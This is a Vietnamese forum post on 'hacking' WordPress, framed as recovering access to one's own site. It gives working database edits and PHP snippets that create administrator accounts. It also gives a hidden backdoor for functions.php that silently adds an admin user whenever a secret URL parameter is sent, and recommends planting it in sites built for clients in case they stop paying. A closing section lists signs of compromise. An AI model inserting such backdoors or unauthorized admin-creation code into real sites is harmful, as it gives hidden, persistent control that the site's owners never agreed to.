Hack WordPress

Tác giả Network Engineer, T.Bảy 17, 2020, 01:46:42 CHIỀU

« Chủ đề trước - Chủ đề tiếp »

0 Thành viên và 2 Khách đang xem chủ đề.

Hack WordPress


Chúng tôi không chia buồn, chấp thuận hay khuyến khích bất kỳ hành vi bất hợp pháp hoặc phá hoại nào. Mục đích của bài viết này là để giải thích cách hack hoặc lấy lại quyền truy cập vào trang web WordPress thuộc về bạn hoặc bạn có quyền chỉnh sửa, quản trị và truy cập. Dù bạn làm gì, bạn vẫn tự làm điều đó. Chúng tôi không chịu trách nhiệm cho hành động của bạn. Hướng dẫn này chỉ phục vụ cho mục đích giáo dục.


Các phương pháp được mô tả sẽ giúp bạn lấy lại quyền truy cập vào trang Web ngay cả khi bạn không còn tài khoản quản trị, nhưng sẽ yêu cầu một số thông tin về trang Web và chúng đã giành chiến thắng giúp bạn hack vào bất kỳ cài đặt WordPress ngẫu nhiên nào.

Dễ dàng lấy lại quyền truy cập vào trang Web WordPress của bạn bằng các phương pháp hack đơn giản này. Hãy cẩn thận và đừng dùng những phương pháp này cho những hành vi bất hợp pháp hoặc phá họai.

I. Cách hack một trang Web WordPress.

1. Hack MySQL WordPress.

Sử dụng phương pháp này để thay đổi mật khẩu hoặc tên người dùng nếu cần của người dùng hiện tại hoặc để tạo tài khoản mới. Bạn sẽ cần truy cập cPanel hoặc truy cập MySQL trực tiếp vào cơ sở dữ liệu của trang web. Hãy để bắt đầu bằng cách thay đổi mật khẩu của người dùng hiện có.

Nếu bạn sử dụng cPanel, đăng nhập cPanel luôn có thể được truy cập qua liên kết   Đăng nhập để xem liên kết, xác định vị trí và mở phpMyAdmin. Danh sách các cơ sở dữ liệu và bảng ở bên trái. Bạn đang tìm kiếm bảng kết thúc bằng _users. Nó có thể là wp_users, nhưng nếu bạn có nhiều hơn một trang WordPress được cài đặt trên máy chủ, bạn phải tìm đúng.

Bảng bên phải sẽ có người dùng bạn muốn chỉnh sửa trong đó. Thực hiện theo quy trình tương tự nếu bạn có thể kết nối với MySQL thông qua một số máy khách bên ngoài như SQLyog. Khi bạn xác định vị trí bảng và hồ sơ người dùng thực tế, sẽ đến lúc thay đổi mật khẩu.

Như bạn có thể nhận ra bây giờ, mật khẩu được lưu trong cột user_pass, được băm bằng thuật toán MD5. Mở trình tạo MD5 trực tuyến, nhập mật khẩu bạn muốn sử dụng và nhấp vào Hash. Sao chép chuỗi đã tạo và thay thế mật khẩu ban đầu bằng nó. Trong phpMyAdmin, bạn có thể chỉnh sửa cột này bằng cách nhấp đúp vào nó. Thủ tục tương tự trong các máy khách MySQL khác. Lưu các thay đổi và đăng nhập vào WordPress bằng mật khẩu mới của bạn.


Tên người dùng, mật khẩu đã được băm và Email được lưu trữ trong bảng cơ sở dữ liệu wp_users.

Tạo một người dùng mới phức tạp hơn một chút nhưng vẫn có thể quản lý được trong vòng chưa đầy một phút. Tạo một bản ghi mới trong bảng người dùng và điền: user_login, user_pass được băm, sử dụng hàm MD5 được mô tả ở trên và user_email. Tất cả các cột khác có thể vẫn trống rỗng, chúng không quan trọng. Lưu bản ghi mới. Sau khi lưu, MySQL sẽ cung cấp cho nó một ID duy nhất. Nó là con số trong cột ID. Hãy ghi nhớ nó.

Bây giờ hãy vào bảng _usermeta. Hãy nhớ rằng, tiền tố bảng phải giống với tiền tố của người dùng. Ví dụ: wp_userswp_usersmeta. Nếu tiền tố không giống nhau, bạn đã chỉnh sửa bảng sai của một số cài đặt WP khác và tài khoản mới sẽ không thể hoạt động như chúng ta mong đợi. Chúng tôi sẽ tạo ra hai bản ghi mới. Bỏ qua trường umeta_idcho cả hai. Đặt trường user_id thành giá trị bạn vừa nhớ giá trị ID mới trong bảng người dùng. Đối với bản ghi đầu tiên, đặt meta_key thành wpct_user_levelmeta_value thành 10. Đối với bản ghi thứ hai meta_key thành wpct_capabilities meta_value thành a:1:{s:13:"administrator";b:1;}. Lưu cả hai. Bạn đã hoàn thành, bây giờ chúng ta hãy thử đăng nhập xem sao.

2. Hack functions.php.

Cách tiếp cận này có thể được sử dụng bằng cách chỉnh sửa functions.php thông qua cPanel hoặc bằng cách sử dụng máy khách FTP để thực hiện. Nếu sử dụng cPanel, hãy tìm File Manager và mở nó. Đầu tiên, chúng ta phải tìm thư mục của giao diện đang sử dụng.

Chuyển đến thư mục public_html/wp_content/Themes. Nếu bạn thấy ngay giao diện của mình và biết đó là giao diện gì. Mở thư mục của nó và bắt đầu chỉnh sửa chức functions.php. Nếu không, hãy mở trang Web, nhấp chuột phải vào bất cứ nơi nào, chọn View source. Sau đó nhấn Ctrl + F và bắt đầu gõ /themes/ soon bạn sẽ có rất nhiều URL được tô sáng và bạn sẽ nhận ra tên thư mục của giao diện Web đang hoạt động.

Tìm nó trong cấu trúc tập tin, mở và bắt đầu chỉnh sửa functions.php. Sao chép và dán đoạn mã sau vào cuối tập tin. Hãy nhớ việc đóng thẻ đóng của PHP ?> nếu bạn có chúng. Nó phải ở dòng cuối cùng. Vì vậy, chèn mã vào trước nó.

Mã nguồn [Chọn]
$new_user_email = '[email protected]';
$new_user_password = '12345';

if(!username_exists($new_user_email)) {
  $user_id = wp_create_user($new_user_email, $new_user_password, $new_user_email);

  wp_update_user(array('ID' => $user_id, 'nickname' => $new_user_email));

  $user = new WP_User($user_id);
  $user->set_role('administrator');
}

Chỉ chỉnh sửa hai dòng đầu tiên của mã để phản ánh tài khoản mới của bạn. Nếu có một người dùng trong WP với Email đó, một tài khoản mới sẽ được tạo ra, vì vậy hãy chắc chắn rằng nó mới. Thay đổi mật khẩu cũng vậy. Sau khi lưu tập tin, chỉ cần mở trang web của bạn, mã sẽ được chạy, một tài khoản mới với quyền quản trị sẽ được tạo và bạn sẽ có thể đăng nhập với nó.

Sau khi bạn làm như vậy, hãy nhớ xóa đoạn mã đó khỏi functions.php.

3. Các phương pháp hack khác.

Khi biết mật khẩu FTP, cPanel hoặc MySQL, bạn sẽ chứng minh rằng bạn có quyền truy cập hợp pháp vào máy chủ và do đó cũng nên có quyền truy cập vào các cài đặt WordPress. Nếu bạn không có bất kỳ tài khoản nào trong số đó, thì bạn sẽ không hoạt động tốt để hack vào các trang web của người khác và điều đó không hay.

Xin nhớ rằng việc truy cập trái phép vào bất kỳ máy tính, trang Web hoặc máy chủ nào là một tội nghiêm trọng và được xử lý kịp thời ở hầu hết các quốc gia.

Nếu bạn sợ rằng trang Web WordPress của bạn có thể bị hack, vui lòng kiểm tra nó trang này bằng cách quét các lỗ hổng bảo mật WordPress miễn phí.


Nếu bạn không có thời gian để thiết lập bảo mật Website của mình, hãy để chúng tôi làm điều đó cho bạn.

II. Cách tạo Backdoor trong WordPress.

Khi cửa trước được đóng lại, bạn có thể thử cửa sau. Điều này nghe có vẻ như là một cách độc hại khi sử dụng mã để vào trang web mà không có quyền truy cập vào nó, nhưng thực sự có những lúc bạn cần kiểm soát trang Web của chính mình nếu ai đó đánh cắp nó.

Nếu bạn tạo ra các trang Web cho người khác một vài thứ, sớm hay muộn sẽ có một khách hàng từ chối trả tiền cho bạn cho công việc của bạn, khách hàng sẽ xóa thông tin đăng nhập của bạn và kiểm soát mọi thứ bạn đã làm. Đôi khi, nó sẽ đủ để tạo một người dùng mới thông qua FTP hoặc để đặt lại mật khẩu. Khi điều đó không thể xảy ra, bạn có thể muốn xâm nhập trở lại hoặc tạo quyền truy cập cửa sau vào các trang quản trị của bạn.

Nhưng nếu bạn quyết định ẩn một đoạn mã nhỏ trong môi trường WordPress của mình, bạn có thể tiết kiệm cho mình một chút phẩm giá và có quyền truy cập vào trang web WordPress với các quyền của quản trị. Và đó là nơi mà các trò chơi bắt đầu.

Cho dù kẻ trộm này xóa thông tin của bạn bao nhiêu lần hoặc khôi phục bản sao lưu trên máy chủ mà anh ta có thể sở hữu, vẫn có khả năng anh ta không biết bất cứ điều gì về lối vào cửa sau. Nếu anh ta làm vậy, anh ta có lẽ sẽ cần sự giúp đỡ của bạn trong việc thiết lập WordPress, phải không?

Tạo một cửa hậu:

Ở đây, một đoạn mã bạn sẽ cần để hoàn thành công việc:

  • Mở tập tin functions.php.
  • Sao chép và dán mã sau đây.

Mã nguồn [Chọn]
add_action('wp_head', 'wploop_backdoor');
function wploop_backdoor() {
        If ($_GET['backdoor'] == 'knockknock') {
                require('wp-includes/registration.php');
                If (!username_exists('username')) {
                        $user_id = wp_create_user('name', 'pass');
                        $user = new WP_User($user_id);
                        $user->set_role('administrator');
                }
        }
}
?>

  • Lưu thay đổi.

Nếu bạn để lại mã như hiện tại, tất cả những gì bạn cần làm để tạo một quản trị viên mới trên trang web là truy cập.


Sau khi trang được tải, tên người dùng mới của bạn là tên name và mật khẩu là pass.

Tất nhiên, bạn có thể thay đổi điều đó trong đoạn mã trên bằng cách thay đổi namepass qua thành bất cứ điều gì bạn muốn. Bạn cũng có thể thay đổi liên kết đến cửa sau của mình bằng cách thay đổi backdoor và / hoặc knockknock đối với bất cứ điều gì bạn nghĩ ra.

Hãy thử chức năng năng này - không chỉ thú vị mà nó thực sự có thể giúp bạn đôi khi trong tương lai khi bạn chuẩn bị tạo một trang Web cho một người mà bạn có thể tin tưởng hoàn toàn. Bạn cũng nên nâng cấp kỹ năng WordPress và Blog của bạn.

III. Cách tạo tài khoản người dùng mới qua FTP.

Tạo tài khoản người dùng mới trên WordPress rất dễ dàng. Là quản trị viên, bạn cần điều hướng đến trang quản trị Users nơi bạn có thể tạo tài khoản mới cho bất kỳ vai trò người dùng nào. Điều đó có thể được thực hiện trong vài giây và người dùng mới được tạo có thể đăng nhập ngay lập tức với tên người dùng và mật khẩu.

Nhưng điều gì xảy ra nếu bạn mất quyền truy cập vào quản trị WordPress của mình? Mọi thứ có thể phức tạp hơn một chút, nhưng đừng lo lắng - chúng tôi có một chức năng cho bạn có thể cứu mạng quản trị của bạn.

Cho dù quản trị khác đã xóa tài khoản của bạn, cho dù bạn đã xóa tất cả người dùng khỏi cơ sở dữ liệu, sử dụng Plugin bị trục trặc hoặc bị hack, bạn vẫn có thể lấy lại quyền kiểm soát. Đôi khi, bạn chỉ có thể có quyền truy cập vào máy chủ FTP của mình trong khi https sẽ nằm ngoài tầm với của bạn và bạn sẽ cần tạo một quản trị viên mới. Mặc dù đó có thể là một trường hợp hiếm gặp, nhưng chức năng sau đây sẽ cứu bạn.

Để tạo một tài khoản mới bên ngoài môi trường quản trị WordPress, tất cả những gì bạn cần là truy cập FTP vào trang web của bạn. Là quản trị, bạn nên có tất cả thông tin cần thiết để đăng nhập vào máy chủ của mình và bạn có thể nhanh chóng tạo tài khoản mới bằng cách tạo một chức năng mới trong giao diện của mình.

Tạo tài khoản người dùng mới qua FTP:

  •     Mở ứng dụng khách FTP và kết nối với tài khoản của bạn.
  •     Điều hướng đến wp-content/themes.
  •     Mở thư mục của giao diên bạn đang sử dụng.
  •     Tìm kiếm tập tin tests.php và chỉnh sửa nó.
  •     Sao chép và dán hàm sau.

Mã nguồn [Chọn]
function admin_account(){
$user = 'Username';
$pass = 'Password';
$email = '[email protected]';
if ( !username_exists( $user )  && !email_exists( $email ) ) {
$user_id = wp_create_user( $user, $pass, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
} }
add_action('init','admin_account');

  • Thay đổi tên người dùng, mật khẩu và email thành một cái gì đó độc đáo của riêng bạn.
  • Lưu thay đổi.

Đảm bảo rằng tên người dùng, mật khẩu và địa chỉ email bạn đặt trong hàm là duy nhất hoặc nếu không thì hàm này sẽ không hoạt động đúng. Khi bạn đã lưu các thay đổi, bạn đã thực hiện xong và bạn có thể điều hướng đến bảng đăng nhập WP của mình. Sử dụng thông tin mới để đăng nhập lại và sau khi bạn đã xác minh lấy lại quyền kiểm soát tài khoản quản trị và Web, bạn có thể xóa hàm này khỏi tập tin tin.php.

Hàm hiển thị ở trên tạo tài khoản quản trị nhưng bạn có thể dễ dàng sửa đổi nó để tạo tài khoản với bất kỳ vai trò người dùng nào khác. Chỉ cần thay đổi vai trò trên hàng thứ 8 của mã trong trình soạn thảo như tác giả, cộng tác viên, người đăng ký hoặc bất kỳ vai trò người dùng nào khác mà bạn đã tạo.

Thật không may, nếu bạn bị mất tài khoản quản trị, bạn cũng đã mất tất cả các bài viết được viết dưới tên người dùng đó. Đó là lý do tại sao bạn phải luôn luôn giữ một bản sao lưu mà bạn có thể dễ dàng lấy. Nếu bạn đang đọc tài liệu này trong khi có tài khoản quản trị, hãy xem đây là lời nhắc để tạo bản sao lưu ngay lập tức và đánh dấu bài viết này chỉ trong trường hợp bạn cần tạo tài khoản bên ngoài WordPress trong tương lai.

IV. 10 dấu hiệu trang web WordPress của bạn bị hack.

WordPress là một nền tảng Blog khổng lồ. Có hàng triệu người dùng và dường như con số này đang tăng lên nhanh chóng mỗi ngày. Mọi người thậm chí có xu hướng chuyển các trang Web của họ được tạo trong các hệ thống quản lý nội dung khác sang hệ thống nguồn mở này thường xuyên hơn bạn nghĩ. Và, trong khi điều này là tốt, điều này có nghĩa là tin tặc cũng sẽ đưa WordPress vào vị trí số một khi cố gắng xâm chiếm các trang web ngẫu nhiên.

Thông thường, nếu bạn bị hack, bạn sẽ biết về điều đó ngay lập tức. Trang web của bạn sẽ không thể truy cập được, bạn đã giành chiến thắng có thể đăng nhập và đôi khi một hacker thậm chí sẽ để lại tin nhắn trên trang nhất. Nhưng thường xuyên hơn, bạn thậm chí có thể không nhận thấy rằng một cái gì đó đã thay đổi. Trong phần này của bài viết, chúng tôi sẽ giới thiệu cho bạn một số dấu hiệu có thể cho bạn thấy rằng trang web WordPress của bạn đã bị hack và một vài giải pháp cho vấn đề này.

1. Đăng nhập không thành công.

Dấu hiệu này là khá rõ ràng. Nếu bạn đã sử dụng kết hợp tên người dùng và mật khẩu trong một thời gian mà không gặp sự cố, bạn có thể nghi ngờ nếu đột nhiên WordPress không nhận ra tài khoản của bạn. Nếu một hacker phải đăng nhập vào trang web của bạn, rất có thể anh ta sẽ nhanh chóng thay đổi quyền quản trị của bạn.

Có lẽ anh ta phải thay đổi mật khẩu của bạn hoặc xóa hoàn toàn tài khoản của bạn. Trước khi bạn bắt đầu hoảng loạn sau lần đầu tiên WordPress nhắn tin cho bạn về tên người dùng và mật khẩu không chính xác, vui lòng xem xét thực tế rằng bạn có thể đã nhập sai kết hợp hoặc bạn có thể đã bật nút Caps Lock.

Giải pháp: Hãy thử khôi phục mật khẩu qua Email hoặc sử dụng tài khoản khác để đăng nhập lại. Để đảm bảo rằng bạn đăng nhập được an toàn, chúng tôi khuyên bạn nên cài đặt Plugin Login Ninja cho WordPress.

2. Nội dung độc hại được thêm vào trang web của bạn.

Nếu bạn bắt đầu nhận thấy nội dung lạ trên trang web của mình, bạn có thể bắt đầu lo lắng. Khi họ có cơ hội truy cập vào khu vực quản trị của bạn, tin tặc sẽ có thể thay đổi lõi trang Web của bạn cũng như các tập tin giao diện và Plugin của bạn. Điều đó có nghĩa là họ có thể thay đổi bất cứ điều gì họ muốn.


Mặc dù một số tin tặc sẽ sửa đổi mạnh mẽ giao diện trang Web của bạn và thậm chí có thể chúng thông báo hẳn trên trang Web của bạn rằng bạn đã bị hack, một số tin tặc khác thì sẽ tinh tế hơn nhiều về nó.

Giải pháp: Hãy thử tìm kiếm nội dung ẩn trong mã trang Web. Có thể có các liên kết đến các trang Web độc hại được tin tặc đặt ở chân trang của bạn hoặc chúng có thể đã cài đặt để bật các cửa sổ Popups  lên và sẽ mở thường xuyên cho khách hàng của bạn. Sử dụng Security Ninja để quét trang web của bạn hoặc liên tục theo dõi trang Web của bạn cho các vấn đề như vậy.

3. Chuyến thăm đáng ngờ.

Nếu bạn không theo dõi trang Web của mình, bạn nên bắt đầu làm ngay lập tức. Một cách đơn giản để làm là sử dụng Google Analytics, trong số nhiều tính năng khác, có thể cho bạn biết bạn nhận được bao nhiêu lượt truy cập và những lượt truy cập đó đến từ đâu. Sau một thời gian, bạn sẽ làm quen với trang web của bạn. Điều đó có nghĩa là bạn sẽ biết các lượt truy cập đến từ đâu, bạn sẽ biết khi nào bạn khởi chạy một chiến dịch mới và khi nào có các liên kết quảng cáo mới được phát hành trong tự nhiên.

Nhưng nếu bạn đột nhiên nhận thấy rằng trang web của bạn đang nhận được một số lượng lớn lượt truy cập mới từ tên miền đáng ngờ, bạn sẽ muốn điều tra thêm vì trang web của bạn có thể bị hack. Thông thường, loại lượt truy cập đó sẽ dẫn đến tỷ lệ thoát 100%, điều đó có nghĩa là chỉ có một trang được truy cập. Tin tặc sẽ thường xuyên sử dụng các hệ thống tự động sẽ dẫn các trang web xấu khác đến với bạn. Cho dù nó có mã xấu được thực thi trên trang web của bạn hoặc bạn đã trở thành một phần của mạng Spam, mọi thứ có thể trở nên nghiêm trọng và bạn sẽ phải kiểm tra trang web của mình để tìm mã độc.

Giải pháp: Sử dụng Google Webmasters Tools của Google để tìm các tên miền đáng ngờ.

4. Lưu lượng truy cập giảm đột ngột.

Không giống như dấu hiệu bị hack cuối cùng được đề cập, cái này có thể cảnh báo bạn vì đột nhiên số lượng truy cập giảm. Thay vì giới thiệu các lượt truy cập mới cho bạn, một hacker có thể gửi các lượt truy cập khỏi trang web của bạn. Điều này có thể xảy ra vì một hacker đã chuyển hướng trang Web của bạn sang một trang khác. Lý do khác để có ít khách truy cập hơn là Google đưa vào danh sách đen trang web của bạn. Hành động này sẽ hiển thị một thông báo cho mọi người dùng có thể chọn không mở trang web của bạn vì nó bị nhiễm mã độc.


Giải pháp: Sử dụng công cụ Safe Browsing Site Status của Google để kiểm tra xem trang web của bạn có bị đánh dấu là không an toàn và hiện nguy hiểm khi truy cập.

5. Kết quả công cụ tìm kiếm là lạ.

Nếu bạn không nhận thấy bất kỳ thay đổi nào trên trang web của mình, nhưng bạn phát hiện ra rằng kết quả tìm kiếm trong Google và các công cụ tìm kiếm khác là lạ, hiển thị các tiêu đề khác nhau và dữ liệu meta khác, đây có thể là dấu hiệu rõ ràng của một trang web bị tấn công. Một hacker có thể đã thay đổi nội dung trang Web của bạn theo cách chỉ có thể nhìn thấy đối với một chuyên gia. Tuy nhiên, thay đổi sẽ hiển thị trong kết quả của công cụ tìm kiếm.

Giải pháp: Kiểm tra trang web của bạn bằng Webmasters Tools của Google và kiểm tra xem trang web của bạn có bị tấn công bằng công cụ trực tuyến miễn phí này không.

6. Bạn không thể gửi và nhận Email.

Khi một hacker có quyền truy cập vào trang web của bạn, anh ta có thể sẽ muốn sử dụng máy chủ của bạn để Spam mọi người khác. Khi bạn phát hiện ra rằng bạn không thể gửi hoặc nhận email mới từ WordPress của bạn, đây có thể là một dấu hiệu rõ ràng cho thấy bạn đã bị hack. Kiểm tra Email của bạn một lần nữa, sau đó kiểm tra nó với nhà cung cấp của bạn để đảm bảo rằng không có lỗi nào xảy ra.

Giải pháp: Kiểm tra chức năng thư WordPress của bạn với Plugin miễn phí này.


7. Trang web không tồn tại. Đôi khi tin tặc đã giành được truy cập vào trang web của bạn để tạo mã độc, chuyển hướng người dùng hoặc sử dụng Email của bạn để Spam. Đôi khi, tất cả những gì họ sẽ muốn làm là đánh sập trang web của bạn. Hiếm khi, một hacker sẽ xóa thành công mọi thứ khỏi toàn bộ máy chủ. Đó là lý do tại sao điều quan trọng là bạn lưu trữ các tập tin của mình tại một công ty lưu trữ nổi tiếng sẽ bảo mật và cũng giữ các bản sao lưu hàng ngày hoặc ít nhất là hàng tuần của trang web của bạn. Đó là một cách thực hiện tốt mà thỉnh thoảng bạn cũng tự sao lưu để trang web có thể được khôi phục nhanh chóng.


Giải pháp: Cài đặt một trong những Plugin tốt nhất để quản lý sao lưu trong WordPress.

8. Tập tin đáng ngờ.

Tương tự như nội dung độc hại có thể được thêm vào các tập tin hiện có, tin tặc có thể trồng thêm các tập tin ở bất kỳ đâu trong thư mục gốc của Web của bạn. Đó là một điều tốt để biết cách của bạn xung quanh WordPress, nhưng nếu bạn không có kinh nghiệm, bạn nên có một công cụ bảo mật theo ý của bạn để có thể kiểm tra tất cả các tập tin và hoạt động của bạn. Gần đây, chúng tôi đã xem xét Security Ninja là một công cụ hoàn hảo để kiểm tra tất cả các tập tin WordPress của bạn.

Giải pháp: Hãy thử tìm kiếm các tập tin mà không thuộc về cài đặt WordPress của bạn. Sử dụng Security Ninja để quét trang web của bạn một cách thường xuyên và tự động tìm các tập tin đó. Sau đó xóa các tập tin hoặc xóa mã độc khỏi các tập tin bị nhiễm. Đừng quên phần Core Scanner cho Security Ninja.

9. Thành viên mới.

Tùy thuộc vào trang web của bạn, bạn có thể là người duy nhất có thể thêm thành viên mới. Trong trường hợp đó, một Email cho bạn biết về người dùng mới đăng ký có thể kích hoạt báo động. Nếu có những quản trị viên khác có khả năng thêm thành viên mới, hãy kiểm tra với họ về hoạt động đáng ngờ.

Giải pháp: Thay đổi URL đăng nhập bằng một Plugin miễn phí, giới hạn quyền truy cập vào trang đăng nhập WordPress của bạn bằng cách sử dụng tập tin .htpasswd và sử dụng Login Ninja để bảo vệ biểu mẫu đăng nhập của bạn mọi lúc.

10. Kiểm tra các sự kiện theo lịch trình trên máy chủ của bạn.

Đôi khi, một hacker đã giành được một thứ gì đó cho trang web của bạn một khi họ tìm được đường vào. Thay vào đó, họ sẽ để lại các sự kiện theo lịch trình có thể gây hại cho trang web của bạn trong tương lai. Kỹ thuật này rất nguy hiểm vì ban đầu một hacker có thể khiến nạn nhân thiếu kinh nghiệm không biết gì. Bạn có thể bị nhiễm bệnh và không biết gì về nó.

Giải pháp: Kiểm tra các công việc CRON của bạn trên máy chủ mà bạn đang sử dụng và đảm bảo không có các tác vụ theo lịch trình đáng ngờ.

Tóm lại.

Chúng tôi hy vọng rằng bài viết này sẽ giúp bạn quản lý ngay cả một trang web WordPress an toàn hơn và nó sẽ giúp bạn lấy lại quyền truy cập vào nó trong các tình huống xấu. Và ngay cả khi trang web của bạn sạch sẽ, xin vui lòng đừng coi đó là điều hiển nhiên.

Luôn đảm bảo rằng Wlog của bạn an toàn nhất có thể. Chúng tôi đề xuất các Plugin bảo mật cho WordPress có thể giúp bạn tiết kiệm nhiều lần. Tuy nhiên, hãy đừng là người sử dụng mật khẩu không an toàn và hãy cẩn thận khi hack vào trang web WordPress của riêng bạn.